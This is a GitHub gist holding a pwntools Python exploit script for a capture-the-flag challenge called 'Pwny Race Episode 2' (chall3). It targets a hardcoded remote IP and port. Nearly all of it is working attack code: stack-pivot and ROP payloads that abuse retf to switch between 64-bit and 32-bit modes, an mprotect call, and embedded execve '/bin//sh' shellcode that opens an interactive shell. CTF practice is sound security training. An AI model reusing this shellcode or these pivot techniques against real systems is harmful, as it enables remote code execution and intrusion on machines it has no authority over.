Skip to content

Instantly share code, notes, and snippets.

@v0s
Created March 10, 2019 01:04
Show Gist options
  • Save v0s/ba4a890f533c6f42caac5e4bbf577a37 to your computer and use it in GitHub Desktop.
Save v0s/ba4a890f533c6f42caac5e4bbf577a37 to your computer and use it in GitHub Desktop.
Exploit for Pwny Race Episode 2 (./chall3)
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 54.194.197.206 --port 11528 ./chall3
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./chall3')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '54.194.197.206'
port = int(args.PORT or 11528)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug(['./chall3_orig'] + argv, gdbscript=gdbscript, *a, **kw)
elif args.EDB:
return process(["/usr/bin/edb", "--run", './chall3_orig'] + argv, *a, **kw)
else:
return process(['./chall3_orig'] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: No RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
io = start()
read_addr = 0x4001a9
esp_pivot = 0x400134
payload = ""
payload += p32(read_addr) + p32(0x33) # seed = pivot to read x64
payload += "A"*32
payload += p32(read_addr) + p32(0x33) # seed = pivot to read x64
payload += p64(esp_pivot)
io.send(payload)
io.recvline()
io.recvline()
io.recvline()
# print "cont?"
# raw_input()
payload = ""
payload += "A"*32
payload += p32(read_addr) + p32(0x33) # seed = pivot to read x64
payload += p64(0x400213) # retf in x86
payload += "P"*8 # here 0x22 (x86) will land
payload += p32(read_addr) + p32(0x33) # seed = pivot to read x64
payload += "_"*32
# payload += "\x00"*88 + "aaaabbbbccccddddeeeeffffgggghhhh"
payload += "\x00"*96 + p32(0x2b) + "\x00"*20 + p32(0x060004e8) + p32(0x23) + "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\xcd\x80" #shellcode
# payload += "\x00"*88 + "aaaabbbbccccddddeeeeffffgggghhhh"
io.send(payload) # #QQQQRRRRSSSSTTTT
io.recvline()
# print "cont?"
# raw_input()
payload = ""
payload += "A"*32
payload += p32(read_addr) + p32(0x33) # seed = pivot to read x64
payload += p64(0x400137) # int 80h in x86
payload += "P"*8 # here 0x22 (x86) will land
payload += "AAAABBBBCCCCDDDDEEEEFFFFGGGG" + p32(0x060004e0) + p32(0x06000000) + p32(7) + p32(0x1000) + p32(0x7d) + "MMMMNNNN" + p32(0x400137) + "\x23\x00\x00"
# payload += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPP"
# sys_read returns 0x77 <- eax = 0x77
# BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA______
io.send(payload)
#payload += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT"
## esp ebx edx ecx eax eip cs ss
#ebx=start, ecx=len, edx=prot
# payload += "AAAABBBB"
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment